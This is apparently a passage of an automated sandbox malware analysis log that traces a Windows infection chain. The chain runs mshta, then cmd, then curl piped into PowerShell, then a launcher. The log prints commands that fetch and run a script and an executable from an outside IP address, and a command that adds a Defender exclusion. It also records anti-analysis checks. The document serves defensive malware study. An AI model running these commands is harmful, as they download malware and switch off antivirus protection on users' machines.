            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeMemory allocated: 7BE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Temp\Launcher.exeMemory allocated: 7ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Temp\Launcher.exeMemory allocated: 9ED0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5154Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4657Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7828Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1771Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4356Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5425Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Windows\Temp\iviewers.dllJump to dropped file
            Source: C:\Windows\Temp\Launcher.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-6727
            Source: C:\Windows\Temp\io12j1es.2tm.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-65360
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5772Thread sleep count: 5154 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272Thread sleep count: 4657 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1220Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Temp\Launcher.exe TID: 792Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1E0B500 FindClose,FindFirstFileExW,GetLastError,12_2_00007FF6F1E0B500
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1E0B5B0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,12_2_00007FF6F1E0B5B0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD73F0 GetLogicalDriveStringsW,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1DD73F0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE9038 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,12_2_00007FF6F1DE9038
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\migration\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\migration\wtr\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior
            Source: io12j1es.2tm.exe, 0000000C.00000003.1896641477.000001F157548000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F1574C9000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000003.1905591176.000001F15753A000.00000004.00000020.00020000.00000000.sdmp, io12j1es.2tm.exe, 0000000C.00000002.2109507353.000001F15751F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: curl.exe, 00000004.00000003.1738251016.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1781524753.0000000006C0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: powershell.exe, 00000005.00000002.1773038956.000000000079C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\"
            Source: C:\Windows\Temp\io12j1es.2tm.exeAPI call chain: ExitProcess graph end nodegraph_12-65301
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DDA430 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,_invalid_parameter_noinfo_noreturn,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,12_2_00007FF6F1DDA430
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00B6FE37
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1E0D804 GetLastError,IsDebuggerPresent,OutputDebugStringW,12_2_00007FF6F1E0D804
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B5B905 __EH_prolog3_GS,#540,#4155,StringFromGUID2,wsprintfW,RegQueryValueW,#540,#540,#538,#4155,#4155,#940,#4155,#940,#1197,#355,#2507,#3494,#858,#800,#800,#641,LoadLibraryW,GetProcAddress,#800,#641,#4155,#4155,#940,#1197,FreeLibrary,#6398,#800,#800,#800,#800,6_2_00B5B905
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF9EEC GetProcessHeap,12_2_00007FF6F1DF9EEC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Temp\io12j1es.2tm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6FAC0 SetUnhandledExceptionFilter,6_2_00B6FAC0
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6F4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00B6F4CC
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00B6FE37
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DFEC08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF6F1DFEC08
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE7F68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF6F1DE7F68
            Source: C:\Windows\Temp\Launcher.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DCB420 ShellExecuteW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1DCB420
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s http://147.45.47.15/script.ps1Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\Launcher.exe "C:\Windows\Temp\Launcher.exe" Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'"Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\Temp\io12j1es.2tm.exe "C:\Windows\Temp\io12j1es.2tm.exe" Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6C7BB SetSecurityDescriptorDacl,GetLastError,6_2_00B6C7BB
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6DA20 GetCurrentProcess,OpenProcessToken,malloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,free,CloseHandle,6_2_00B6DA20
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: GetLocaleInfoW,12_2_00007FF6F1DF9310
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: GetLocaleInfoEx,FormatMessageA,12_2_00007FF6F1E0B170
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: GetLocaleInfoW,12_2_00007FF6F1DF9518
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_00007FF6F1DF9468
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF6F1DF964C
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: EnumSystemLocalesW,12_2_00007FF6F1DEDAE0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,12_2_00007FF6F1DF8C04
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00007FF6F1DF90C8
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: GetLocaleInfoW,12_2_00007FF6F1DEE020
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: EnumSystemLocalesW,12_2_00007FF6F1DF9030
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: EnumSystemLocalesW,12_2_00007FF6F1DF8F60
            Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Temp\Launcher.exeQueries volume information: C:\Windows\Temp\iviewers.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
